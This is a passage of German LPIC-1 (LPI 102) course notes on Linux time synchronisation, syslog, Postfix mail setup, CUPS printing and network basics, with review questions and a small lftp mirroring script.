  10. Mit welchem Kommando kann man unter X11 die Tastaturbelegung temporär von Deutsch auf US-Amerikanisch umstellen (Siehe obigen Link)?

    setxkbmap us

10. Topic 108.1: Maintain system time

10.1. Uhrzeit stellen

Unterschiede Windows / Unix:

  • Windows konfiguriert die Uhr lediglich nach Localtime (Ortszeit, hier: Berlin)

  • Unix führt zwei Uhren: Die HW-Uhr läuft nach GMT/UTC, die SW-Uhr liefert bei Anfrage einer Anwendung die Zeit je nach Zeitzone live umgerechnet aus.

  • Herausfinden, nach welcher Uhr das System läuft: cat /etc/adjtime -→ hier wird entsprechend dem Linux-Standard u.a. "UTC" ausgegeben, das bedeutet:

    • Die BIOS-Uhr läuft nach GMT, sie Software-Uhr muss immer umrechnen

    • Diese Voreinstellung ist NICHT empfehlenswert bei einem Dual-Boot mit Windows, dann muss in der adjtime der Wert "LOCAL" eingetragen werden, dann aber dürfen HW- und SW-Uhr nicht mehr mit Zeitversatz zu laufen

Das Stellen der beiden Unix-Uhren:

  • Software-Uhr: date, rdate, ntpdate

  • Hardware-Uhr: hwclock

Beispiele (Als root auszuführen):

  • Nur Zeit stellen: date -s 10:20

  • Zeit und Datum: date 01271012

  • Zeit und Datum mittels NTP (TCP-Port 123): ntpdate time.fu-berlin.de

  • Die HW-Uhr nach der SW-Uhr stellen: hwclock --systohc [--utc] [--localtime]

  • In Ausnahmefällen umgekehrt: hwclock --hctosys

Zeitsynchronisation mit NTP-Server

  • Installation unter Debian: apt-get install ntp (= Server und Client zugleich)

  • Konfiguration: vi /etc/ntp.conf

    • Angabe eines Zeitservers im LAN: server 10.0.0.1

    • Angabe eines speziellen Zeitservers: server time.fu-berlin.de

  • Server stoppen, um Uhr an GMT heranführen zu können: service ntp stop

  • Uhr nach GMT stellen: ntpdate pool.ntp.org

  • Server starten: service ntp start

  • Kontrolle der NTP-Queue (Peers ausgeben): ntpq -p (Interessante Spalten: offset, jitter)

  • Interaktive Kontrollprogramm: ntpdc (help / sysinfo)

  • Bei Debian bietet der NTP-Server automatisch seinen Dienst im LAN an, zur Überprüfung:

    nmap -p 123 -sU 172.16.0.1   (NICHT mit 'localhost' testen)

10.2. NTP-Server auf CentOS einrichten

Die Software ist bereits vorinstalliert.

  • Konfiguration: vi /etc/ntp.conf

    • Angabe den benachbarten Zeitservers im LAN: server 172.16.0.1 (Die anderen Server auskommentieren)

  • Dienst starten: service ntpd start

  • Runlevel-Links für automatischen Start erzeugen:

    • Bis CenOS 6.5: chkconfig ntpd on

    • Ab CentOS 7.0: systemctl enable ntpd

  • Kontrolle: Siehe oben (ntpq, ntpdc)

10.3. Übungen/Fragen zur Wiederholung

  1. Wie kann man sich das Datum nach "Coordinated Universal Time" (UTC) ausgeben lassen?
    Siehe dazu:

  2. Wie kann man mit Hilfe der System/Software-Uhr die BIOS-Uhr stellen, wenn letztere zu weit abgedriftet ist?

    date 01281005
    hwclock --systohc [--utc] [--localtime]         (Standard ist dabei die UTC-Zeit.)
    -> Kurzformen:  -w (--systohc), -u (--utc)
  3. Wie lässt sich die Systemzeit in einem einmaligen Vorgang via Internet mit Hilfe eines sehr genauen Protokolls stellen?

    ntpdate pool.ntp.org
  4. Wie heißt die Konfigurationsdatei des Dienstes, des mit Hilfe dieses sehr genauen Protokolls die Systemzeit permanent überwachen und stellen kann?

    /etc/ntp.conf
  5. Setzen Sie mit Hilfe von hwclock die Uhrzeit ohne Umwege über ein weiteres Kommando.
    Siehe dazu:

11. Topic 108.2: System logging

11.1. Log-Daemons

Mit dem Starten von Linux werden Logdienste auf zwei Ebenen gestartet:

a) 'klogd' fängt die frühen Kernelmeldungen ab und speichert sie später ab
   (Input: /proc/kmsg, Output: /var/log/boot.log)
b) 'syslogd' nimmt dann alle möglichen Meldungen  (von verschiedensten Diensten stammend)
   entgegen und speichert sie in unterschiedlichste Dateien oder sendet sie an andere Syslog-Daemons

Es gibt interschiedlichste Implementierungen des syslogd:

  • Klassischer syslogd

  • Verbesserter Dienst: syslog-ng

  • Dienst mit verschlüsselter Kommunikation: rsyslogd

11.2. Konfiguration des alten Syslogd

  • Name der Datei: /etc/syslog.conf

  • Aufbau der Datei:

    • Header: Definition von allgemeinen Variablen, Modulen und Arbeitsverzeichnissen

    • Rules: Aufsplittung in drei Spalten: facility.level action

    • Zur Spalte facility: Mögliche Meldungs-Quellen (Auswahl):

      • auth (Autorisierung)

      • cron (Zeitdienst)

      • kern (Kernel)

      • local0 bis local7 (frei belegbare Quellen)

    • Zur Spalte level: Mögliche Meldungs-Level:

      • debug (Anwendungsdebugging)

      • info (allgemeine Informationen)

      • notice (etwas wichtigere Hinweise)

      • warn, warning (i.d.R. harmlos)

      • err, error (Fehler)

      • crit

      • alert

      • emerg

        Dabei beinhalten niedrigere Level die Meldungen der höheren, z.B.
        beinhaltet '*.info' den Level "info" und höher. Möchte man exakt nur
        einen Level loggen, ist das '=' erforderlich: '*.=info'
    • Zur Spalte action: Mögliche Aktionen:

      • Logausgabe in Datei: /var/log/auth.log (absolute Pfade!)

      • Logausgabe in Datei, wobei zwischengepuffert wird (Minus voranstellen): -/var/log/syslog

      • Logausgabe auf Konsole: /dev/tty10

      • Logausgabe an einen Benutzer: max

      • Logausgabe an alle eingeloggten Benutzer: *

      • Logausgabe an den entfernten Loghost-Rechner senden: @loghost (Der Daemon auf diesem Loghost muss mit Option -r gestartet werden)

      • Logausgabe auf benannte Pipe: |, z.B. |/dev/xconsole

        Um unter Debian die bereits vordefinierte Protokollierung via
        '/dev/xconsole' auslesen zu können, müssen die Berechtigungen
        angepasst werden:
        chgrp adm /usr/bin/xconsole
        chmod 2755 /usr/bin/xconsole
        Damit kann nun ein Benutzer dieses Programm 'xconsole' aufrufen und
        die vor allem auch die Meldungen lesen.
        ACHTUNG: Bitte in Sachen Datenschutz aufpassen: wird hier 'auth' und
        'authpriv' mit in die Pipe geschrieben?
        Zur Untersuchung des Falls:
             'grep -v ^#  /etc/rsyslog.conf | grep -B4  xconsole'
        Die Ausgabe dieser Zeile lautet:
daemon.*;mail.*;\
        news.err;\
        *.=debug;*.=info;\
        *.=notice;*.=warn       |/dev/xconsole

Besser wäre im obigen Abschnitt hinzuzufügen: auth,authpriv.none


Aufgabe: Geben Sie die Ausgabe aller Dienste jeden Levels auf die Konsole /etc/tty10 aus. Hinweis: Nach Änderung der Konfigdatei muss der Dienst "reloaded" werden.

Lösung:

echo '*.*         /dev/tty10' >> /etc/rsyslog.conf
service rsyslog restart
logger 'Logging und Jogging...'
STRG + ALT + F10

11.3. Sichern / Komprimieren der Logdateien

Das Tool der Wahl: logrotate

Arbeitsweise: Logdateien werden umbennant und komprimiert, danach wird einfach eine neue Datei erzeugt und Daten hineingeschrieben. Siehe man logrotate

Das Programm wird über cron gesteuert.

Bitte Datei /etc/logrotate.conf studieren…

11.4. Betrachten von Logfiles

  • tail -f -n30 /var/log/boot.log

  • tail -f -n30 /var/log/syslog

  • tail -f -n30 /var/log/messages

  • logtail

  • logwatch (Logparser)

11.5. Fragen/Aufgaben zur Wiederholung

  1. Zählen Sie alle Facilities der /etc/syslog.conf Syslog-Deamons auf.

    • Siehe man syslog.conf

      auth, authpriv, cron, daemon, kern, lpr, mail, mark, news, syslog, user, uucp, local0 - local7
  2. Zählen Sie alle Prioritäts-Level der /etc/syslog.conf auf.

    • Siehe man syslog.conf

      debug, info, notice, warning, warn (same as warning), err, error (same as err), crit, alert, emerg,  panic  (same  as  emerg)
  3. Listen sie die Möglichkeiten von Aktionen (Log-Ziele) in der /etc/syslog.conf auf.

    • Logfile (Mit absoluten Pfaden! Ein vorangestelltes Minus bedeutet "Kein sofortiges "sync" duchführen, sondern "Caching ist erlaubt")

    • Named Pipes: "|", z.B. /dev/xconsole

    • Unix Domain Socket: "@@"

    • Terminals/Consolen: /dev/tty10

    • Remote Machine: "@RemoteHostName"

    • List of Users: "root,max,fritz"

    • An jeden eingeloggten Benutzer (via Kommando wall): "*"

  4. Erstellen Sie einen Log-Eintrag, der speziell nur die beiden Facilities user und lpr in eine Datei /var/log/user.log schreibt.

    • Datei Bearbeiten: vi /etc/syslog.conf einfügen

                   user,lpr.*              /var/log/user.log
      Alternativ:
                   user.*;lpr.*            /var/log/user.log
  5. Wie kann man eine bestimmte Facility NICHT mit in ein File loggen lassen?

    • Ausnahme: facility.none'

    • Beispiel von Debian:

      *.*;auth,authpriv.none              -/var/log/syslog
  6. Welche Sonderzeichen können den "Actions" vorangestellt werden und was bedeuten Sie?

    • Minus: Logdatei wird gepuffert

    • @: An rechner weiterleiten

    • Pipe: An Benannte Pipte weiterleiten

    • Stern: An jeden eingeloggten Benutzer senden

12. Topic 108.3: Mail Transfer Agent (MTA) basics

Zum Einstieg: Google-Bildsuche: mta mda mua maa

Komponenten:

  • Mail Transfer Agent (MTA) = Mailer Daemon, Direktübertragung zwischen MTAs via Simple Mail Transfer Protocol (SMTP, TCP-Port: 25)

    => Das ganze Internet spricht SMTP!
  • Mail Delivery Agent (MDA) = Postbote, der die eingegangene Mail verteilt

  • Mail User Agent (MUA) = Mail Reader/Writer (Thunderbird, Evolution, kmail, mail, …)

  • Mail Access Agent (MAA) = Paketdienst zum verschlossenen Briefkasten, da einfache Nutzer i.d.R. keinen MX-Record bei Ihrem Nameserver haben, müssen sie selber zum Postkasten gehen., Protokolle: POP3, IMAP

12.1. Einrichtung von MTA - MTA-Kommunkation

Welcher MTA sollte man wählen?

  • sendmail (Sehr flexibel aber auch komplizierte und eher unsicher)

  • postfix (= Standard Linux-MTA, modular, sicher)

  • qmail (moduler, sehr sicher)

  • exim (kleiner, feiner Daemon, Standard Debian-MTA)

Installation von "postfix"

  • DEBIAN: apt-get install postfix (Profil "Internet Site" wählen, DNS-Name: domain.site)

  • CentOS: rpm -qa | grep post (Ist bereits vorinstalliert)

Konfigdateien:

  • Meisterdatei: /etc/postfix/master.cf (Einbindung von Spamassissin, ClamAV, == Inetd)

  • Hauptdatei: /etc/postfix/main.cf (Hauptkonfigdatei)

    Wichtige Einstellungen:

  • Für welche Domaine nehme ich Nachrichten an? ⇒ mydestination

    BILDUNG: hostname.domain.tld

    Hostname ermitteln: "hostname" → deb7

    Im Beispiel:

    mydestination = deb7.domain.site, localhost
  • Aus welchem Netzwerk Anfragen zugelassen werden: ⇒ mynetworks

    Im Beipiel:

    mynetworks = 172.16.0.0/30 127.0.0.0/8 ...
  • Soll über einen MX-Record (DNS, via UDP, Port 53) die Mail-Domäne aufgelöst werden? Nein: im einfachsten Falle reicht statische Auflösung in den /etc/hosts-Dateien auf allen beteiligten Rechnern.

    Schalter explizit setzen:

    disable_dns_lookups = yes

Kontrolle der Einstellungen: postconf -n | egrep 'mydest|mynet|dns'

disable_dns_lookups = yes
mydestination = deb7.domain.site, localhost
mynetworks = 172.16.0.0/30 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128

Dienst neu starten: service postfix restart

12.1.1. Namensauflösung für beide Testsysteme konfigurieren

Statische Zuordnung vi /etc/hosts (Eintragen der IP-Adress-Namenzuordnung des jeweils Anderen)

  • Auf Debian: 172.16.0.2 cent7.domain.site cent7

  • Auf CentOS: 172.16.0.1 deb7.domain.site deb7

BEISPIEL VON CENTOS:

cat /etc/hosts
### Die Domaine für die Maschine selbst festlegen:
127.0.0.1  cent7.domain.site  cent7
::1        cent7.domain.site  cent7

### Den benachbarten MTA auflösen
172.16.0.1  deb7.domain.site  deb7

Hostname festlegen:

vi /etc/hostname
cent7.domain.site

12.2. Mailsystem inbetriebnehmen

Checkliste:

  • Funktioniert die Namensauflösung?

    • hostname -f (Dateien: /etc/hostname, /etc/hosts)

    • domainname -d [-I]

    • Bei Debian zusätzlich wichtig: /etc/mailname (→ deb7.test.site)

    • ping-Tests mit FQDN durchführen

  • Konfiguration von Postfix (auf Debian):

    • Unter Debian:

      • Datei prüfen: egrep '^mydest|^mynet|dns' /etc/postfix/main.cf

        mydestination = deb7.test.site, localhost
        mynetworks = 172.16.0.0/30 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
        disable_dns_lookups = yes
      • Resultierende Einstellungen: postconf | egrep '^mydest|^mynet|disable_dns'

        disable_dns_lookups = yes
        mydestination = deb7.test.site, localhost
        mynetworks = 172.16.0.0/30 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
        mynetworks_style = subnet
    • Unter CentOS:

      • Datei prüfen: egrep '^mydest|^mynet|dns' /etc/postfix/main.cf

        mydestination = $myhostname, localhost.$mydomain, localhost
        disable_dns_lookups = yes
      • Resultierende Einstellungen: postconf | egrep '^mydest|^mynet|disable_dns'

        disable_dns_lookups = yes
        mydestination = $myhostname, localhost.$mydomain, localhost
        mynetworks = 127.0.0.0/8 172.16.0.0/30 192.168.99.0/24 [::1]/128        [fe80::]/64
        mynetworks_style = subnet
  • Nach Änderungen der /etc/postfix/main.cf nicht vergessen, den MTA neu zu starten:

    service postfix reload
  • Nun müssen beide Systemen Port 25 geöffnet haben: netstat -tln

E-Mails versenden

  • Von Debian aus: echo Inhalt | mail -s Mailing1 tux@cent7.domain.site

  • Von CentOS aus: echo Inhalt | mail -s Mailing2 tux@deb7.test.site

Kontrolle:

  • Debian (in separaten Fenster): tail -f /var/log/mail.log

  • CentOS (in separaten Fenster): tail -f /var/log/maillog

  • Auf beiden Systemen: Ist die ausgehende Queue (/var/spool/mqueue) leer geworden? mailq

  • Wenn nicht, sofortigen Zustellversuch anstoßen: sendmail -q

  • Auf beiden Seiten die mbox-Dateien im Empfangsordner betrachten (Zeitstempel!):

    ls -ltrc /var/spool/mail/
    -rw------- 1 mail    mail 223427 Jan 28 14:39 mail
    -rw-rw---- 1 nobody  mail    876 Jan 28 15:09 nobody
    -rw-rw---- 1 herbert mail    445 Jan 29 15:12 herbert
    -rw-rw---- 1 hubert  mail    455 Jan 29 15:13 hubert
    -rw-rw---- 1 tux     mail   7258 Jan 29 16:09 tux
  • Oder als Nutzer die Mails regulär lesen:

    su - herbert
    mail

Wie auch openSuSE sagt: Have a lot of fun…

12.3. Fragen/Aufgaben zur Wiederholung

  1. Nennen Sie vier typische Linux-MTA’s.

    • sendmail

    • postfix

    • qmail

    • exim

  2. Woran erkennt man, dass der Mailer Daemon die Mails erfolgreich ausliefern konnte?

    ⇒ Es sind keine Mails mehr in der ausgehenden Warteschlange, zur Überprüfung:

    • Kommando mailq

    • Verzeichnis /var/spool/mqueue

  3. Mit welchem Kommando kann man einen erneuten Mail-Auslieferungsversuch auslösen?

    • Kommando sendmail -q

  4. Wie heißt die Datei, in der Sie einen anderen, stellvertretenden E-Mailnamen für ein oder mehrere existierende E-Mail-Adressen definieren können? (Vollständigen Pfad mitsamt Dateinamen angeben)

    • Datei /etc/aliases

  5. Welches Kommando müssen Sie ausführen, nachdem Sie solch einen stellvertretenden E-Mailnamen festgelegt haben?

    • Kommando newaliases

  6. Wie heißt die Datei, in der Sie als einfacher Benutzer für den Zeitraum Ihrer Urlaubsabwesenheit die E-Mailadresse Ihrer Vertretung angeben können, die dann Ihre Nachrichten erhält?

    • Datei ~/.forward

  7. Erweitern Sie das Skript ftpmirror um einen im Vorfeld auszuführenden Erreichbarkeitstest des verwendeten FTP-Servers. Ist er nicht ansprechbar, soll das Skript vor der Ausführung von "lftp" seine Arbeit mit einer Fehlermeldung und dem Exitcode 5 quittieren.

Dateiname des Skriptes: ftpmirror

#!/bin/bash
#
# ftpmirror

host="lpic1.example.test"

download(){
  lftp -e 'mirror --verbose /HandOuts/PemmannAxel/LPI-102 /home/tux/LPI-102; by' $host
}


### Lösung 1
#ping -c1 $host > /dev/null 2>&1 || download


### Lösung 2
#ping -c 1 $host
ping -c 1 $host > /dev/null 2>&1
if [ $? -ne 0 ]
        then
            echo "NETZWERKFEHLER: Host $host nicht erreichbar."
        else
            download
fi

13. Topic 108.4: Drucker und Druckvorgänge verwalten

13.1. Linux-Drucksysteme

  • Der portierte BSD-Spooler: lpr/lpd (Line Print Daemon)

    • /etc/printcap: Kürzel: rm = remote machine, rp/lp = remote printcap

  • Erweiterter BSD-Spooler: lpr-ng (Line Print Next Generation)

  • CUPS: Common Unix Printing System (von Apple)
    -→ spezielles Protokoll: Internet Printing Protocol (IPP, TCP-Port 631)

Das große Problem ist nach wie vor: Wie ist der Linux-Support (Treiber), also vor dem Kauf informieren:

Ziel ist hierbeit, eine zum Drucker passende PostScript Printer Description (PPD-Datei) zu erhalten.

Was bedeutet Drucker "Linux-Druckertreiber"?

  • In erster Linie: Übersetzungprogramm (Filter) von verschiedensten Druckersprachen (z.B. PCL5) ins Unix-Standardausgabeformat PostScript.

    AUFGABE: Suche nach Paketen mit "filter" im Namen
    apt-cache search filter | egrep -i 'print|druck'
    => Treffer, u.a.: foomatic, foomatic-db-gutenprint, ghostscript-cups
  • Hardware-Schnittstellen

    • Einfacher Test für Paralleldrucker: echo Hallo Drucker... > /dev/lp0

    • USB-Drucker werden i.d.R. via udev automatisch erkannt

    • Netzwerkdrucker (Printserver): werden z.T. ebenfalls erkannt, ansonsten einfache manuelle Konfiguration möglich

13.2. Verwalten von Warteschlangen

Je nach Drucksystem gibt es unterschiedliche Kommandos, aus Kompatibilitätsgründen wird aber eine Mindestausstattung von BSD-artigen Tools immer mit ausgliefert, die rudimentäre Verwaltungsoptionen bieten.

Wichtige Werkzeuge:

  • Warteschlange einsehen: lpq [-l], lpstat

  • Druckaufträge löschen: lprm, lpr -r

  • Aufträge verwalten: lpc (interaktives Programm, so kann z.B. mit topq ein Druckauftrag an den Anfange der Warteschlage gestellt werden.), cupsenable, cupsdisable, cupsaccept, cupsreject

13.3. Druckaufträge senden

Wichtige Werkzeuge:

  • Vom alten BSD-Spooler stammend: lpr

    • Anzahl von Kopien angeben: -#, alternativ: -K

    • Druckername angeben (Printer): -P <NAME>

    • Rohdaten ausdrucken (kein Druckerfilter benutzen): -l (Alternative: -o raw)

  • Mit CUPS ausgelifert: lp

    • Anzahl von Kopien angeben: -n

    • Druckername angeben (destination): -d <NAME>

13.4. Drucker konfigurieren

13.5. Konfiguration eine CUPS-Drucksystemes

Installation

  • Debian: apt-get install cups
    (Metapaket für Komplettsystem, nur der Client: cups-client)

  • CentOS: yum install cups

Konfiguration

  • Drucker anschließen, und für Autoerkennung einschalten (USB, Netzwerk)

  • Drucker hinzufügen

    • Per Web-UI: Im Webbrowser: http://localhost:631

      • Alternativ kann das Webfrontend für LAN-Nutzung freigeschaltet werden. Siehe unter Zugriff via Web-Frontend

        a) Ist Port 613 offen?
        nmap -p 631 localhost   --> Ja, per lo (127.0.0.1)
        GRUND:  grep Listen /etc/cups/cupsd.conf
                                        Listen localhost:631
        nmap -p 613 172.16.0.1  --> Nein
        ==> einfach eine Ziele hinzufügen:  "Listen 172.16.0.1:631"
        Zusätzlich muss am Ende des Abschnittes "<Location /admin>"
        hinzugefügt werden:  "Allow @LOCAL"
        b) Die wichtigsten Schritte:
      • "Administration" → "Add Printer" → Als root authentifizieren

      • Jetzt sollten Drucker entdeckt worden sein ("Discovered Printer") → Auswahl treffen (evl. mit dmesg kontrollieren, ob USB-Gerät gefunden wurde;
        im Netzwerk selber suchen: nmap -p 21,613,9100 192.168.2.0/24)
        ⇒ Oft verwendete URI, falls keine Erkennung möglich war: socket://10.0.0.10:9100

      • Im Feld "Name" kurzen Namen vergeben

      • Treiber finden (Per Hersteller/Modell, notfalls "generic"-Treiber mit zugehöriger Druckerspache wählen (PCL6)

      • Bestätigen mit "Add Printer"

      • Papieroptionen mit "Set Default Options" festlegen

      • Im letzten Schritt den neuen Drucker zum Standarddrucker machen:
        → unter "Drucker Verwalten"(Englisches UI: "Administration")
        "Als Standard festlegen" (engl: "Set as Server default")

      • Kontrolle: Nach lpstat -t zeigt nun auch lpq den Drucker an.

13.6. Fragen/Aufgaben zur Wiederholung und Vertiefung

13.6.1. Theoretische Fragen

Laden Sie das Dokument von http://ftp.utcluj.ro/pub/docs/ldp/bible-src/howtos/printing.html, beantworten Sie auf dessen Basis sowie mit Hilfe der jeweiligen man-Pages die folgenden Fragen.

  1. Wozu dient das Programm pr, wie können Sie damit einen Heftrand von 7 ASCII-Zeichen erzeugen?
    man pr
    → Weiterführendes unter:

  2. Studieren Sie die Möglichkeiten des Verwaltungswerkzeuges lpc.
    http://ftp.utcluj.ro/pub/docs/ldp/bible-src/howtos/printing.html#SEC32

    Beispiele aus dieser Quelle:

    lpc down myprinter
    lpc enable yourprinter
    lpc topq 37
  3. Wie ist die Datei /etc/printcap aufgebaut, wie gibt man entfernte Drucker an?
    http://ftp.utcluj.ro/pub/docs/ldp/bible-src/howtos/printing.html#SEC35

    Aus dieser Quelle: cat /etc/printcap

    # Sample printcap entry with two aliases
    myprinter|laserwriter:\
            # lp is the device to print to - here the first parallel printer.
            :lp=/dev/lp0: \
            # sd means 'spool directory' - where print data is collected
            :sd=/usr/spool/lpd/myprinter:
    Weitere Anweisungen:
            if      string     -     specify the input filter name
            rm      string     -     specify the name of a remote printing machine
            rp      string     -     specify the name of a remote printer
  4. Wie versteht man unter einem Filter-Skript, welche Rolle spielt dabei lpr -l?
    http://ftp.utcluj.ro/pub/docs/ldp/bible-src/howtos/printing.html#SEC57

    = Ausführbares Shell-Skript, das z.B. mit "sed" Zeichen ersetzt und mittels der Anweisung "if=…" in der /etc/printcap aufgerufen wird.

    Das Kommandozeilenfragment lpr -l bedeutet "ohne Filter ausdrucken" (= Rohdatendruck).

  5. Mit welchen Dateien lassen sich beim lpr-Drucksystem Berechtigungen verwalten?
    http://ftp.utcluj.ro/pub/docs/ldp/bible-src/howtos/printing.html#SEC69

    Aus dieser Quelle: /etc/hosts.lpd is for printing only. (Eine Client-Maschine pro Zeile), /etc/hosts.equiv will allow for unauthenticated logins (Trusted Hosts, jeweils ein "hostname username"-Paar pro Zeile hinterlegen)

13.6.2. Praxisaufgabe zur Vertiefung von Shell Scripting

Zielstellung: Erweiterung des Skriptes ftpmirror um eine Upload-Funktionalität

  • Legen Sie eine Ordnerstruktur namens ~/Upload an.

    mkdir ~/Upload
  • Fügen Sie Ihrem Skript eine Funktion namens upload hinzu, die die folgende Kommandozeile beinhaltet, ersetzen Sie dabei das im Quellpfad stehende Wort USER durch Ihren Loginnamen, tragen Sie außerdem im Zielpfad anstelle von <IHR-NACHNAME> Ihren Nachnamen (Ohne Leerzeichen und Umlaute!) ein.

    lftp -e 'mirror --verbose --reverse /home/USER/Upload /HandOuts/Kursteilnehmer/<IHR-NACHNAME>; by' lpic1.example.test
    LÖSUNG:
      upload(){
      lftp -e 'mirror --verbose --reverse /home/tux/Upload /HandOuts/Kursteilnehmer/pemmann; by' $host
    }
  • Erweitern Sie Ihr Skript um eine case-Verzeigung, die bei Übergabe des Schlüsselwortes down einen Download mittels der bereits vorhandenen Funktion download startet. Sehen Sie weiterhin einen zweiten Zweig mit dem Schlüsselwort up für den Upload von Daten vor.
    → Siehe case-Beipiele unter http://www.thegeekstuff.com/2010/07/bash-case-statement/

    Unterhalb von "else" in die if-Verzweigung einfügen, das Wort "download" ausschneiden und unterhalb von "down)" platzieren:
    case "$1" in
        down)
            download ;;
        up)
            ;;
        *)
            echo "Aufruf: $0 {down|up}" ;;
    esac
  • Rufen Sie die oben definierte Funktion upload aus demjenigen case-Zweig auf, den Sie mit dem Schlüsselwort up ausgestattet haben.

    Das Wort "upload" an passender Stelle hinzufügen:
    case "$1" in
        down)
            download ;;
        up)
            upload ;;
        *)
            echo "Aufruf: $0 {down|up}" ;;
    esac
  • Testen Sie das Hochladen von Daten, in dem Sie eine Testdatei in den Ordner ~/Upload legen und danach das Skript mit ./ftpmirror up ausführen.

    echo 123 > ~/Upload/tests.txt
    ./ftpmirror up

Hier ist das gesamte Skript:

#!/bin/bash
#
# ftpmirror

host="lpic1.example.test"

download(){
  lftp -e 'mirror --verbose /HandOuts/PemmannAxel/LPI-102 /home/tux/LPI-102; by' $host
}

upload(){
  lftp -e 'mirror --verbose --reverse /home/tux/Upload /HandOuts/Kursteilnehmer/pemmann; by' $host
}

ping -c 1 $host > /dev/null 2>&1
if [ $? -ne 0 ]
        then
            echo "NETZWERKFEHLER: Host $host nicht erreichbar."
        else
          case "$1" in
            down)
                download ;;
            up)
                upload ;;
            *)
                echo "Aufruf: $0 {down|up}" ;;
          esac
fi

13.7. Freigeben von CUPS-Druckern

Voraussetzung: Ein Drucker wurde bereits mit dem Web-UI oder lpadmin eingerichtet.

13.7.1. Administration via LAN aktivieren (Auf CentOS)

Im Falle der Fernadministration muss neben dem Port-listening und der Freigabe von Server-Root ("/") der Ordner "/admin" freigegeben werden:

Hauptkonfiguratiosdatei bearbeiten: vi /etc/cups/cupsd.conf

       # a) Unterhalb "Listen localhost:631" hinzufügen:
NEW:   Listen 172.16.0.2:631
       # b) Als globale Voraussetzung Druckerfreigaben erlauben
       # Ergänzung von "Allow @LOCAL" im Server-Root-Abschnitt unterhalb von "Order allow,deny":
       <Location />
       Order allow,deny
NEW:   Allow @LOCAL
       </Location>
       # c) Administrative Fernadministration via Web-UI erlauben
       # Ergänzung von "Allow @LOCAL" im "/admin"-Abschnitt
       <Location /admin>
       Order allow,deny
NEW:   Allow @LOCAL
       </Location>

Damit ist der Drucker als Printserver im LAN nutzbar (die erlaubten Netzwerk-IDs werden mittels "@LOCAL" eingebunden), zugleich lassen sich Drucker fernadministrieren.

13.7.2. Freigabe eines speziellen Druckers

Als erstes muss der Druckdienst gestoppt werden, da im laufenden Betrieb die Druckerkonfigurationsdatei NICHT bearbeitet werden darf:

service cups stop

Nun muss die Datei /etc/cups/printers.conf bearbeitet werden, dem Parameter "Shared" übergibt man beim betreffenen Drucker "Yes".

Shared Yes

Nun kann der Dienst wieder gestartet werden:

service cups start

13.7.3. Zugriff via Web-Frontend

Nun ist nicht nur eine Konfiguration vom selben Rechner aus möglich, sondern auch von einem beliebigen Rechner des LANs:

firefox http://172.16.0.2:631
--> Ins Untermenü "Administration" gehen
--> "Add Printer" anklicken
==> Weiterleitung zu Secure-HTTP (https), das selbstsignierte Zertifikat, das
    jetzt ausgelifert wird ist noch gegenzuprüfen:
Ausgabe des Fingerabruckes allgemein:
openssl x509 -fingerprint -noout -in <ZERTIFIKAT>
Beim CentOS-Druckserver wird erst in diesem Moment das CUPS-Zertifikat erzeugt, vorher war der Ordner "/etc/cups/ssl" leer!
Jetzt aber lässt sich der Fingerabrduck auf die Server erzeugen:
openssl x509 -fingerprint -noout -in /etc/cups/ssl/server.crt
(Am besten ausdrucken und dem Client zur Verfügung stellen, damit er den
in seinem Webbrowser angezeigten Zertifikatsfingerabdruck prüfen kann: es muss die selbe Zeichenkette wie die eben von "openssl"
ausgegebene sein!)

13.8. Druckclients einrichten

Unter Linux:

a) Einfache Client-Konfigration (auf Debian)

  • Es muss kein CUPS-Daemon installiert sein/laufen, wir brauchen lediglich das Paket "cups-client".

  • Angabe des CUPS-Servers in der Datei client.conf (eine Art "Zeiger"):

    cat /etc/cups/client.conf
    ServerName 172.16.0.2
  • Unmittelbar danach kann die Erreichbarkeit mit lpq oder lpstat -t getestet werden

  • Drucken kann man z.B. so: pr -o 7 /etc/hosts | lp -d Brother-HL2250

Hierbei wird die komplette Aufbereitung der Druckjobs auf dem entfernten Druckserver gemacht. Das kann bei geringer Rechenleistung evl. länger dauern! Deswegen ist es manchmal besser, die Aufbereitung lokal durchzuführen:

b) Client-Konfigration mit CUPS-Daemon

  • Neuen Drucker im Web-UI- einrichten

  • URI mitgeben (= der "Zeiger"): http://172.16.0.2:631/ipp/

  • Passenden Treiber wählen (Wichtig wegen der lokalen Aufbereitung!)

  • Namen vergeben, speichern…

Unter Windows:

Angabe einer URL im Druckerdialog wie: http://172.16.0.2:631/printers/Brother-HL2250

13.9. Fragen/Aufgaben zur Wiederholung und Vertiefung

  1. Wie heißt die Haupt-Konfigurationsdatei von CUPS (volle Pfadangabe)?

    /etc/cups/cupsd.conf
  2. Wie heißt die Drucker-Konfigurationsdatei von CUPS (volle Pfadangabe)?

    /etc/cups/printers.conf
  3. Wie heißt die Client-Konfigurationsdatei von CUPS, in der Sie einen entfernten Server spezifizieren können (volle Pfadangabe)?

    /etc/cups/client.conf

14. Topic 109.1: Fundamentals of internet protocols

14.1. Einführung TCP/IP

Ein guter Überblick zur Geschichte: http://www.michaelkaul.de/Geschichte/zakon/zakon.html

Eine gute Darstellung der Schichtenmodelle: http://tcp-ip-info.de/glossar/glossar_t.htm

Kurzbeschreibung der einzelnen Schichten:

  • Layer 7: Beschreibung der Anwendungen (E-Mail, WWW → HTTP (zustandslos), FTP)

  • Layer 6: Darstellung der Daten, so dass alle Teilnehmer sie verstehen können, Verschlüsselung (SSL)

  • Layer 5: Kommunikation steuern (VoIP: Sitzung aufbauen, durchführen und abbauen)

  • Layer 4: Datenströme etablieren → i.d.R. via TCP, (Datenverluste ausgleichen), Portnummern definieren

  • Layer 3: Logische Adressierung (IP-Adresse), Wegefindung [Datagramm]

  • Layer 2: Phyische Adressierung (MAC-Adresse), Flusskontrolle [Datenpaket: Frame]

  • Layer 1: Beschreibung der Übertragungsmedieneigenschaften [keine Datenpakete, Bitstrom]

Auf OSI Schichten 1 und 2 rangiert die Standardvernetzungstechnologie "Ethernet", wichtige Merkmale:

  • Definition eines Zugriffsverfahrens CSMA/CD für Shared Media

  • Mittels Media Access Controll-Adressen (MAC = 48 bit lang) lassen sich Netzwerkknoten adressieren

  • Es wird immer Bustopologie verwendet (Heute: Logisch Bus, physisch Stern → Switch)

  • Datenpaketorientierter Transport (Ethernet-Frame) → MTU-Wert: 1500 Byte

    Kommandos:

  • Ausgabe des ARP-Caches: arp -an

  • ARP-Cache löschen: ip neigh flush all

14.2. Portnummern

Lernstoff für LPI 102: Portnummern (Layer 4) gemäß Definition in der /etc/services

